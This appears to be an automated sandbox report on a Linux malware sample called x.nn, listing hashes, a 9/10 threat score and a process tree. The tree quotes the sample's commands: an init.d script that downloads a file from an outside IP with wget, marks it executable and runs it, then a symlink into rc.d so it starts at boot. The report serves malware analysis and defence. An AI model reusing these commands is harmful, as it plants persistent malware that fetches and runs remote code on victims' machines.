Overview

overview

9

Static

static

1

x.nn

ubuntu-22.04-amd64

9

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    08/09/2024, 18:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    x.nn

  • Size

    76KB

  • MD5

    973a64d7c0dfa2aa3fdeeed0b15b14bb

  • SHA1

    9533d5194a3d9c6ced530a2f300f0edfa5cccb69

  • SHA256

    15d168a0a401611890ff27e5cc69edde969d42defa25a82758d8401804bc04ec

  • SHA512

    028b138d464485de35094f3754ff6a3d917a50181cd28f1633fa5fb2bc672bcc739dfdd2cdccde1b7393c8caf3009bb58383775d591de8caea9f96c7caaa1079

  • SSDEEP

    1536:/l1h73pl93YNjnYhd0t++IXonF9dzeet7TxOrQy:tb0jnYhd7ovtD/mQy

Score
9/10
defense_evasiondiscoverypersistence

Malware Config

Signatures

Processes

  • /tmp/x.nn
    /tmp/x.nn
    1⤵
    • Modifies Watchdog functionality
    • Modifies rc script
    • Changes its process name
    PID:1572
    • /bin/sh
      sh -c "echo \"#!/bin/sh # /etc/init.d/x.nn case \\\"\$1\\\" in start) echo 'Starting x.nn' /tmp/x.nn & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping x.nn' killall x.nn ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/x.nn"
      2⤵
      • File and Directory Permissions Modification
      • Modifies init.d
      PID:1574
    • /bin/sh
      sh -c "chmod +x /etc/init.d/x.nn"
      2⤵
      • File and Directory Permissions Modification
      PID:1575
      • /usr/bin/chmod
        chmod +x /etc/init.d/x.nn
        3⤵
        • File and Directory Permissions Modification
        PID:1576
    • /bin/sh
      sh -c "mkdir -p /etc/rc.d"
      2⤵
        PID:1577
        • /usr/bin/mkdir
          mkdir -p /etc/rc.d
          3⤵
          • Reads runtime system information
          PID:1578
      • /bin/sh
        sh -c "ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn"
        2⤵
          PID:1579
          • /usr/bin/ln
            ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn
            3⤵
              PID:1580

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /etc/motd
          Filesize

          53B

          MD5

          2bd9b4be30579e633fc0191aa93df486

          SHA1

          7d63a9bd9662e86666b27c1b50db8e7370c624ff

          SHA256

          64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d

          SHA512

          ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5

          Download Submit